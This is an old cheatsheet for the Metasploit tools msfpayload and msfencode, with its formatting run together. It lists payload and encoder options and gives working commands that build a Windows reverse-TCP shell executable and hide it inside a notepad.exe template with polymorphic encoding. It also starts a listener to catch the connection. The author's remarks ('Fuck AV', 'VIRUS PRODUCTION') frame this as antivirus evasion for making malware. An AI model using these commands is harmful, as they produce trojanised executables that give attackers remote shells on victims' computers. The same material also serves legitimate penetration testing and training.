1. =========================================A LITTLE MSFPAYLOAD/MSFENCODER CHEATSHEET=========================================Last Modify: 08/12/2011Author: luca.mella@studio.unibo.it******************************************************************************msfpayload -l List all payloads avaiblemsfpayload windows/shell/reverse_tcp S Print the summary of payload ------------------------------------------------------------------------Name: Windows Command Shell, Reverse TCP StagerModule: payload/windows/shell/reverse_tcp Version: 10394, 11421Platform: WindowsArch: x86 Needs Admin: NoTotal size: 290Rank: Normal Provided by: spoonm sf hdm skape Basic options:NameCurrent Setting Required Description------------------- -------- -----------EXITFUNC processyesExit technique: seh, thread, none,processLHOST yesThe listen addressLPORT 4444yesThe listen port Description: Connect back to the attacker, Spawn a piped command shell (staged) ------------------------------------------------------------------------msfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 x > program.exe******************************************************************************msfencodeOPTIONS:-a The architecture to encode as-b The list of characters to avoid: x00xff!!! FTW !!!-c The number of times to encode the data !!!Fuck AV !!!-d Specify the directory in which to look for EXE templates-e The encoder to use-h Help banner

2. -i Encode the contents of the supplied file path -k Keep template working; run payload in new thread (use with-x)-lList available encoders-m Specifies an additional module search path-nDump encoder information-o The output file-p The platform to encode for-s The maximum size of the encoded data-t The output format:raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war-vIncrease verbosity-x Specify an alternate executable template!!!VIRUS PRODUCTION !!!SUPPORTED ENCODERS:Name RankDescription---- ---------------cmd/generic_sh goodGeneric Shell Variable SubstitutionCommandcmd/ifslow Generic ${IFS} Substitution CommandEncodercmd/printf_php_mqmanualprintf(1) via PHP magic_quotesUtility Commandgeneric/none normalThe "none" Encodermipsbe/longxor normalXOR Encodermipsle/longxor normalXOR Encoderphp/base64 great PHP Base64 encoderppc/longxornormalPPC LongXOR Encoderppc/longxor_tagnormalPPC LongXOR Encodersparc/longxor_tagnormalSPARC DWORD XOR Encoderx64/xornormalXOR Encoderx86/alpha_mixedlow Alpha2 Alphanumeric MixedcaseEncoderx86/alpha_upperlow Alpha2 Alphanumeric UppercaseEncoderx86/avoid_utf8_tolower manualAvoid UTF8/tolowerx86/call4_dword_xornormalCall+4 Dword XOR Encoderx86/context_cpuidmanualCPUID-based Context Keyed PayloadEncoderx86/context_stat manualstat(2)-based Context Keyed PayloadEncoderx86/context_time manualtime(2)-based Context Keyed PayloadEncoderx86/countdownnormalSingle-byte XOR Countdown Encoderx86/fnstenv_movnormalVariable-length Fnstenv/mov DwordXOR Encoderx86/jmp_call_additivenormalJump/Call XOR Additive FeedbackEncoderx86/nonalpha low Non-Alpha Encoderx86/nonupper low Non-Upper Encoderx86/shikata_ga_nai excellent Polymorphic XOR Additive FeedbackEncoderx86/single_static_bitmanualSingle Static Bitx86/unicode_mixedmanualAlpha2 Alphanumeric UnicodeMixedcase Encoderx86/unicode_uppermanualAlpha2 Alphanumeric UnicodeUppercase Encoder 3. EXAMPLES: msfencode -e x86/alpha_mixedmsfpayload windows/shell/reverse_tcp LHOST=127.0.0.1 R | msfencode -xnotepad.exe -t exe -e x86/shikata_ga_nai -o reversenotepad.exe EXPLOIT SESSION HANDLER:msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcpLHOST=127.0.0.1 E